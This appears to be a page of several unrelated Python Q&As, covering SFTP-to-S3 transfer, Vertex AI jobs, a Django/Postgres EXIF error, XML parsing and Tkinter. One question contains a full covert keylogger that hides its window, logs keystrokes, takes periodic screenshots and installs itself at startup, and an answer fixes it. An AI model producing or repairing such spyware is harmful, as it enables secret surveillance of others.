I have some files on SFTP (named a.csv, b.csv, c.csv) and I want to load those files directly into S3 using Python.
I got the code below from Stack Overflow, but the problem is that instead of ftp_priv_key_filename, I connect to the SFTP server using a password.
Please suggest the correct approach. Thanks.
import math
import os
from boto.s3.connection import S3Connection
import io
import paramiko
import stat
import time
chunk_size = 12428800
ftp_priv_key_filename = '/path/to/private/key' # this script assumes private key auth
ftp_username = 'user'
ftp_host = '100.10.86.59'
ftp_port = 22
ftp_dir = '/import/TMP'
s3_id = 'abc'
s3_key = 'xyz'
bucket_name = 'efg/mno/pqr'
s3_conn = S3Connection(s3_id, s3_key)
bucket = s3_conn.get_bucket(bucket_name)
pkey = paramiko.RSAKey.from_private_key_file(ftp_priv_key_filename)
transport = paramiko.Transport((ftp_host, ftp_port))
transport.connect(username=ftp_username, pkey=pkey)
ftp_conn = paramiko.SFTPClient.from_transport(transport)
def move_file(filepath):
    key_id = filepath.replace(ftp_dir, '').lstrip('/')
    key = bucket.get_key(key_id)
    ftp_fi = ftp_conn.file(filepath, 'r')
    source_size = ftp_fi._get_size()
    if key is not None:
        # check if we need to replace, check sizes
        if source_size == key.size:
            print('%s already uploaded' % key_id)
            ftp_fi.close()
            return
    chunk_count = int(math.ceil(source_size / float(chunk_size)))
    mp = bucket.initiate_multipart_upload(key_id)
    print('%s uploading size: %imb, %i chunks' % (
        key_id, math.ceil(source_size/1024/1024), chunk_count))
    for i in range(chunk_count):
        start = time.time()
        chunk = ftp_fi.read(chunk_size)
        end = time.time()
        seconds = end - start
        print('%s read chunk from ftp (%i/%i) %ikbs' % (
            key_id, i + 1, chunk_count,
            math.ceil((chunk_size / 1024) / seconds)))
        fp = io.BytesIO(chunk)
        start = time.time()
        mp.upload_part_from_file(fp, part_num=i + 1)
        end = time.time()
        seconds = end - start
        print('%s upload chunk to s3 (%i/%i) %ikbs' % (
            key_id, i + 1, chunk_count,
            math.ceil((chunk_size / 1024) / seconds)))
    mp.complete_upload()
    ftp_fi.close()

def move_dir(directory):
    ftp_conn.chdir(directory)
    for filename in ftp_conn.listdir():
        filepath = os.path.join(directory, filename)
        if stat.S_ISDIR(ftp_conn.stat(filepath).st_mode):
            move_dir(filepath)
        else:
            move_file(filepath)

move_dir(ftp_dir)
You just have to take out the following line:
pkey = paramiko.RSAKey.from_private_key_file(ftp_priv_key_filename)
and modify the transport connect call as follows (basically using a password instead of the private key; define ftp_password with your SFTP password in place of ftp_priv_key_filename):
transport.connect(username=ftp_username, password=ftp_password)
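For completeness, here is a minimal end-to-end sketch combining password auth with the newer boto3 client instead of the legacy boto S3Connection (boto3, the bucket name, and ftp_password are assumptions; adapt them to your environment):

import boto3
import paramiko

ftp_host = '100.10.86.59'
ftp_port = 22
ftp_username = 'user'
ftp_password = 'secret'      # password auth instead of a private key
bucket_name = 'my-bucket'    # hypothetical bucket name

# connect to SFTP with a password (no pkey argument)
transport = paramiko.Transport((ftp_host, ftp_port))
transport.connect(username=ftp_username, password=ftp_password)
sftp = paramiko.SFTPClient.from_transport(transport)

# stream each remote file straight into S3 without writing it to disk;
# upload_fileobj handles multipart uploads internally
s3 = boto3.client('s3')
for name in ('a.csv', 'b.csv', 'c.csv'):
    with sftp.file('/import/TMP/' + name, 'rb') as remote_file:
        s3.upload_fileobj(remote_file, bucket_name, name)

sftp.close()
transport.close()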
You can load a selected file to S3 using Python like below. Note that this snippet actually uses FTPS (FTP over TLS via ftplib), not SFTP; for a true SFTP server you would stick with paramiko as above.
from ftplib import FTP_TLS
import s3fs
import logging
def lambda_handler(event, context):
    s3 = s3fs.S3FileSystem(anon=False)
    ftp_url = "100.10.86.59"
    ftp_path = "/import/TMP/"
    s3Bucket = "efg/mno/pqr"
    file_name = "sample.txt"
    ftps = FTP_TLS(ftp_url)
    ftps.login('<user_name>', '<pwd>')
    ftps.prot_p()
    ftps.cwd(ftp_path)
    ftps.retrbinary('RETR ' + file_name, s3.open("{}/{}".format(s3Bucket, file_name), 'wb').write)
Reference - https://github.com/vhvinod/ftp-to-s3/blob/master/ftp-cred-to-s3.py
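One caveat with that snippet (a suggested tweak, not part of the original answer): the file object returned by s3.open() is never closed, so the tail of the upload may not be flushed to S3. A context manager avoids that:

with s3.open("{}/{}".format(s3Bucket, file_name), 'wb') as s3_file:
    ftps.retrbinary('RETR ' + file_name, s3_file.write)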
Related
I am running a Vertex AI batch prediction job using the Python API.
The function I am using is from the Google Cloud docs:
import datetime
from typing import Sequence, Union

from google.cloud import aiplatform
from google.oauth2 import service_account

def create_batch_prediction_job_dedicated_resources_sample(
    key_path,
    project: str,
    location: str,
    model_display_name: str,
    job_display_name: str,
    gcs_source: Union[str, Sequence[str]],
    gcs_destination: str,
    machine_type: str = "n1-standard-2",
    sync: bool = True,
):
    credentials = service_account.Credentials.from_service_account_file(
        key_path)
    # Initialize an aiplatform object
    aiplatform.init(project=project, location=location, credentials=credentials)
    # Get a list of Models by Model name
    models = aiplatform.Model.list(filter=f'display_name="{model_display_name}"')
    model_resource_name = models[0].resource_name
    # Get the model
    my_model = aiplatform.Model(model_resource_name)
    batch_prediction_job = my_model.batch_predict(
        job_display_name=job_display_name,
        gcs_source=gcs_source,
        gcs_destination_prefix=gcs_destination,
        machine_type=machine_type,
        sync=sync,
    )
    # batch_prediction_job.wait_for_resource_creation()
    batch_prediction_job.wait()
    print(batch_prediction_job.display_name)
    print(batch_prediction_job.resource_name)
    print(batch_prediction_job.state)
    return batch_prediction_job

datetime_today = datetime.datetime.now()
model_display_name = 'test_model'
key_path = 'vertex_key.json'
project = 'my_project'
location = 'asia-south1'
job_display_name = 'batch_prediction_' + str(datetime_today)
model_name = '1234'
gcs_source = 'gs://my_bucket/Cleaned_Data/user_item_pairs.jsonl'
gcs_destination = 'gs://my_bucket/prediction'

create_batch_prediction_job_dedicated_resources_sample(key_path, project, location,
                                                       model_display_name, job_display_name,
                                                       gcs_source, gcs_destination)
OUTPUT:
92 current state:
JobState.JOB_STATE_RUNNING
INFO:google.cloud.aiplatform.jobs:BatchPredictionJob projects/my_project/locations/asia-south1/batchPredictionJobs/37737350127597649
The above output is printed to the terminal over and over, every few seconds.
The issue is that the Python program calling this function keeps running until it is force-stopped. I have tried both batch_prediction_job.wait() and batch_prediction_job.wait_for_resource_creation(), with the same result.
How do I start a batch_prediction_job without waiting for it to complete, terminating the program just after the job has been created?
I gave you the wrong instruction in the comments; change the parameter to sync=False and the function should return right after the job is created. As the docs say about the sync parameter:
Whether this function call should be synchronous (wait for pipeline run to finish before terminating) or asynchronous (return immediately)
sync=False
def create_batch_prediction_job_dedicated_resources_sample(
    # ...
    sync: bool = False,
):
UPDATE - Adding more details:
See my notebook code where I tested it and it's working.
You have to change to sync=False AND remove/comment the following lines:
#batch_prediction_job.wait()
#print(batch_prediction_job.display_name)
#print(batch_prediction_job.resource_name)
#print(batch_prediction_job.state)
Your code edited:
def create_batch_prediction_job_dedicated_resources_sample(
    key_path,
    project: str,
    location: str,
    model_display_name: str,
    job_display_name: str,
    gcs_source: Union[str, Sequence[str]],
    gcs_destination: str,
    machine_type: str = "n1-standard-2",
    sync: bool = False,
):
    credentials = service_account.Credentials.from_service_account_file(key_path)
    # Initialize an aiplatform object
    aiplatform.init(project=project, location=location, credentials=credentials)
    # Get a list of Models by Model name
    models = aiplatform.Model.list(filter=f'display_name="{model_display_name}"')
    model_resource_name = models[0].resource_name
    # Get the model
    my_model = aiplatform.Model(model_resource_name)
    batch_prediction_job = my_model.batch_predict(
        job_display_name=job_display_name,
        gcs_source=gcs_source,
        gcs_destination_prefix=gcs_destination,
        machine_type=machine_type,
        sync=sync,
    )
    return batch_prediction_job

datetime_today = datetime.datetime.now()
model_display_name = 'test_model'
key_path = 'vertex_key.json'
project = '<my_project_name>'
location = 'asia-south1'
job_display_name = 'batch_prediction_' + str(datetime_today)
model_name = '1234'
gcs_source = 'gs://<my_bucket_name>/Cleaned_Data/user_item_pairs.jsonl'
gcs_destination = 'gs://<my_bucket_name>/prediction'

create_batch_prediction_job_dedicated_resources_sample(key_path,
                                                       project, location,
                                                       model_display_name,
                                                       job_display_name,
                                                       gcs_source,
                                                       gcs_destination,
                                                       sync=False,)
Results with sync=False: (screenshot omitted)
Results with sync=True: (screenshot omitted)
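Because sync=False returns before the job finishes, you can inspect it later from a separate session. A hedged sketch (BatchPredictionJob.list and the state attribute exist in the google-cloud-aiplatform SDK, but verify against your installed version):

from google.cloud import aiplatform

aiplatform.init(project='my_project', location='asia-south1')

# list recent batch prediction jobs and inspect their states
for job in aiplatform.BatchPredictionJob.list():
    print(job.display_name, job.state)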
I have a Django project. On the host, when I upload an image, an error sometimes occurs (a problem with specific images). The code below shows how I resize uploaded images:
def save_files_to_media(request, is_public=False, klass=None, conversation=None):
    from apps.file.models import File
    fs = FileSystemStorage()
    file_items = {}
    for data_item in request.data:
        file_match = re.search(r'^fileToUpload\[(\d+)\]$', data_item)
        if file_match and file_match.groups():
            item_index = file_match.groups()[0]
            if item_index not in file_items:
                file_items[item_index] = {}
            file_items[item_index]['file_to_upload'] = request.data[data_item]
        else:
            optimize_match = re.search(r'^optimizeType\[(\d+)\]$', data_item)
            if optimize_match and optimize_match.groups():
                item_index = optimize_match.groups()[0]
                if item_index not in file_items:
                    file_items[item_index] = {}
                file_items[item_index]['optimize_type'] = request.data[data_item]
    files = []
    for file_item_key in file_items:
        input_file = file_items[file_item_key]['file_to_upload']
        # TODO: checking validation, in case input_file.name does not exist
        optimize_type = file_items[file_item_key].get('optimize_type')
        file_uuid = str(uuid4())
        if is_public:
            orig_filename, file_ext = splitext(basename(input_file.name))
            directory_name = join(settings.MEDIA_ROOT, file_uuid)
            filename = file_uuid + file_ext
        else:
            directory_name = join(settings.MEDIA_ROOT, file_uuid)
            mkdir(directory_name)
            filename = input_file.name
        filepath = join(directory_name, filename)
        fs.save(filepath, input_file)
        is_optimized = False
        if optimize_type == 'image':
            is_success, filepath = image_optimizer(filepath)
            filename = basename(filepath)
            is_optimized = is_success
        file_obj = File(
            orig_name=filename,
            uuid=file_uuid,
            md5sum=get_md5sum(filepath),
            filesize=get_filesize(filepath),
            meta=get_meta_info(filepath),
            is_optimized=is_optimized,
            creator=request.user
        )
        if is_public:
            file_obj.is_public = True
        else:
            file_obj.klass = klass
            file_obj.conversation = conversation
        file_obj.save()
        files.append(file_obj)
    return files
Here is the error I get with some images:
unsupported Unicode escape sequence
LINE 1: ..., 'ada90ead20f7994837dced344266cc51', 145216, '', '{"FileTyp...
^
DETAIL: \u0000 cannot be converted to text.
CONTEXT: JSON data, line 1: ...ecTimeDigitized": 506779, "MakerNoteUnknownText":
The funny thing is that it works locally but not on the host. For more information, my local PostgreSQL version is 11.3 and the host's PostgreSQL is 9.5.17. Where do you think the problem is? From the error, it seems to be PostgreSQL-related. Thank you.
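Not from the original thread, but a hedged sketch of a common workaround: PostgreSQL text and json columns cannot store the NUL character (\u0000), which some cameras embed in EXIF fields such as MakerNoteUnknownText. Stripping it from the metadata before saving avoids the error (this assumes get_meta_info returns a plain dict):

def strip_nul(value):
    # recursively remove \u0000, which PostgreSQL json/text cannot store
    if isinstance(value, str):
        return value.replace('\x00', '')
    if isinstance(value, dict):
        return {k: strip_nul(v) for k, v in value.items()}
    if isinstance(value, list):
        return [strip_nul(v) for v in value]
    return value

# hypothetical usage inside save_files_to_media:
# meta=strip_nul(get_meta_info(filepath)),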
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET

def xml_to_csv(path):
    xml_list = []
    for xml_file in glob.glob(path + '/*.xml'):
        tree = ET.parse(xml_file)
        root = tree.getroot()
        for member in root.findall('object'):
            value = (root.find('filename').text,
                     int(root.find('size')[0].text),
                     int(root.find('size')[1].text),
                     member[0].text,
                     int(member[4][0].text),
                     int(member[4][1].text),
                     int(member[4][2].text),
                     int(member[4][3].text)
                     )
            xml_list.append(value)
    column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']
    xml_df = pd.DataFrame(xml_list, columns=column_name)
    return xml_df

def main():
    image_path = os.path.join(os.getcwd(), "/images")
    xml_df = xml_to_csv(image_path)
    xml_df.to_csv('baby_labels.csv', index=None)
    print('Successfully converted xml to csv.')

main()
After running this script successfully I got a baby_labels.csv file, but when I open it, no data has been written; it's empty. Can you help me out?
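One likely culprit (a hedged guess, since your directory layout isn't shown): os.path.join discards all earlier components when a later component is absolute, so os.path.join(os.getcwd(), "/images") evaluates to just "/images". If that directory doesn't exist, glob matches no XML files and the CSV comes out empty:

import os

print(os.path.join("/home/me/project", "/images"))  # -> /images (earlier parts dropped)
print(os.path.join("/home/me/project", "images"))   # -> /home/me/project/images

# so in main(), join a relative name instead:
image_path = os.path.join(os.getcwd(), "images")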
I am trying to understand what is happening here. I get a warning that it cannot find reference 'PumpMessages' in 'pythoncom.py', but pip says Requirement already satisfied: pyHook in c:\python27\lib\site-packages, so I assume it is installed correctly.
Any help would be appreciated. I have searched Google for several days to no avail. The code seems to start properly, creating the log file and screencap dir, but no data is collected and it exits with code 1.
This is the code:
import pyHook
import pythoncom
from sys import argv
from datetime import *
import os
import threading
import pyscreenshot
import win32console
import win32gui
import winshell
root_dir = os.path.split(os.path.realpath(argv[0]))[0]
log_file = os.path.join(root_dir, "log_file.txt")
caps_dir = os.path.join(root_dir, "screencaps")
name = "keylog"
buffer = ""
pause_period = 2
last_press = datetime.now()
pause_delta = timedelta(seconds=pause_period)
cap_period = 15
log_semaphore = threading.Semaphore()
def log(message):
    if len(message) > 0:
        log_semaphore.acquire()
        with open(log_file, "a") as f:
            f.write("{}:\t{}\n".format(datetime.now(), message))
            # print "{}:\t{}".format(datetime.now(), message)
        log_semaphore.release()

def keypress(event):
    global buffer, last_press
    if event.Ascii:
        char = chr(event.Ascii)
        if char == "~":
            log(buffer)
            log("---PROGRAM ENDED---")
            os._exit(1)
        pause = datetime.now() - last_press
        if pause >= pause_delta:
            log(buffer)
            buffer = ""
        if event.Ascii == 13:
            buffer += "<ENTER>"
        elif event.Ascii == 8:
            buffer += "<BACKSPACE>"
        elif event.Ascii == 9:
            buffer += "<TAB>"
        else:
            buffer += char
        last_press = datetime.now()

def screenshot():
    if not os.path.exists(caps_dir):
        os.makedirs(caps_dir)
    filename = os.path.join(caps_dir, "screen_" + datetime.now().strftime("%Y_%m_%d_%H_%M_%S") + ".png")
    pyscreenshot.grab_to_file(filename)
    log("---Screenshot taken: saved to {}---".format(filename))
    threading.Timer(cap_period, screenshot).start()

def startup():
    if name + ".lnk" not in os.listdir(winshell.startup()):
        log("---Adding shortcut to startup folder---")
        link_loc = os.path.join(winshell.startup(), name + ".lnk")
        sc = winshell.shortcut()
        sc.path = os.path.realpath(argv[0])
        sc.write(link_loc)

window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
hm = pyHook.HookManager()
hm.KeyDown = keypress
hm.HookKeyboard()
keylog = threading.Thread(target=pythoncom.PumpMessages())
log("---PROGRAM STARTED---")
startup()
screenshot()
keylog.start()
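One thing stands out (a hedged observation, not a tested fix): threading.Thread(target=pythoncom.PumpMessages()) calls PumpMessages immediately and passes its return value as the thread target, so the message pump runs before the thread is even created and the Thread object does nothing useful. Pass the function object instead:

# pass the function itself, not the result of calling it
keylog = threading.Thread(target=pythoncom.PumpMessages)

The exit code 1 itself comes from os._exit(1) in keypress, which fires whenever ~ is typed.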
I am trying to use the Python Tkinter .config() method to update some message text. I can't get it to work. What might I be doing wrong (see the update_message method):
#!/usr/bin/python
import alsaaudio as aa
import audioop
import Tkinter as tk
import tkFont
import threading
import Queue
# styles
BACKROUND_COLOR = '#000000'
TYPEFACE = 'Unit-Bold'
FONT_SIZE = 50
TEXT_COLOR = '#777777'
TEXTBOX_WIDTH = 400
# text
TITLE = 'listen closely'
SCORE_MESSAGE = 'your score:\n '
END_MESSAGE = 'too loud!\ntry again'
# configuration
DEVICE = 'hw:1' # hardware sound card index
CHANNELS = 1
SAMPLE_RATE = 8000 # Hz // 44100
PERIOD = 256 # Frames // 256
FORMAT = aa.PCM_FORMAT_S8 # Sound format
NOISE_THRESHOLD = 3
class Display(object):
    def __init__(self, parent, queue):
        self.parent = parent
        self.queue = queue
        self._geom = '200x200+0+0'
        parent.geometry("{0}x{1}+0+0".format(
            parent.winfo_screenwidth(), parent.winfo_screenheight()))
        parent.overrideredirect(1)
        parent.title(TITLE)
        parent.configure(background=BACKROUND_COLOR)
        parent.displayFont = tkFont.Font(family=TYPEFACE, size=FONT_SIZE)
        self.process_queue()

    def process_queue(self):
        try:
            score = self.queue.get(0)
            self.print_message(score)
        except Queue.Empty:
            pass
        self.parent.after(100, self.update_queue)

    def update_queue(self):
        try:
            score = self.queue.get(0)
            self.update_message(score)
        except Queue.Empty:
            pass
        self.parent.after(100, self.update_queue)

    def print_message(self, messageString):
        print 'message', messageString
        displayString = SCORE_MESSAGE + str(messageString)
        self.message = tk.Message(
            self.parent, text=displayString, bg=BACKROUND_COLOR,
            font=self.parent.displayFont, fg=TEXT_COLOR, width=TEXTBOX_WIDTH, justify="c")
        self.message.place(relx=.5, rely=.5, anchor="c")

    def update_message(self, messageString):
        print 'message', messageString
        displayString = SCORE_MESSAGE + str(messageString)
        self.message.config(text=displayString)

def setup_audio(queue, stop_event):
    data_in = aa.PCM(aa.PCM_CAPTURE, aa.PCM_NONBLOCK, 'hw:1')
    data_in.setchannels(2)
    data_in.setrate(44100)
    data_in.setformat(aa.PCM_FORMAT_S16_LE)
    data_in.setperiodsize(256)
    while not stop_event.is_set():
        # Read data from device
        l, data = data_in.read()
        if l:
            # catch frame error
            try:
                max_vol = audioop.rms(data, 2)
                scaled_vol = max_vol // 4680
                print scaled_vol
                if scaled_vol <= 3:
                    # Too quiet, ignore
                    continue
                queue.put(scaled_vol)
            except audioop.error, e:
                if e.message != "not a whole number of frames":
                    raise e

def main():
    root = tk.Tk()
    queue = Queue.Queue()
    window = Display(root, queue)
    stop_event = threading.Event()
    audio_thread = threading.Thread(target=setup_audio,
                                    args=[queue, stop_event])
    audio_thread.start()
    try:
        root.mainloop()
    finally:
        stop_event.set()
        audio_thread.join()
        pass

if __name__ == '__main__':
    main()
I don't want to lay down a new message every time I update. If .config() doesn't work, is there another method for updating the text configuration of the message?
I would use string variables: first create your string variable, then set it to what you want it to display at the start. Next, create your widget and pass the string variable as textvariable. Then, when you want to change the text in the widget, change the string variable.
self.messaget = StringVar()
self.messaget.set("")
self.message = tk.Message(
    self.parent, textvariable=self.messaget, bg=BACKROUND_COLOR,
    font=self.parent.displayFont, fg=TEXT_COLOR,
    width=TEXTBOX_WIDTH, justify="c")
self.message.grid()
# note: remember to place the widget after you have created it, using either
# .grid(row=..., column=...) or .pack(); call it on a separate line, because
# .grid() returns None, and assigning the chained result would leave
# self.message as None
# note that it is textvariable instead of text; if you put text instead it will
# run, but will show PY_Var... instead of the value of the variable
Edit:
To change the text without recreating the widget, call .set on the string variable you used:
self.messaget.set("hi")
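A minimal self-contained sketch of the pattern (Python 2 Tkinter, matching the question's imports; the values are illustrative):

import Tkinter as tk

root = tk.Tk()
message_var = tk.StringVar()
message_var.set("your score:\n 0")

# textvariable ties the widget's text to the StringVar
message = tk.Message(root, textvariable=message_var, width=400)
message.place(relx=.5, rely=.5, anchor="c")

# updating the StringVar later updates the widget automatically
root.after(1000, lambda: message_var.set("your score:\n 42"))
root.mainloop()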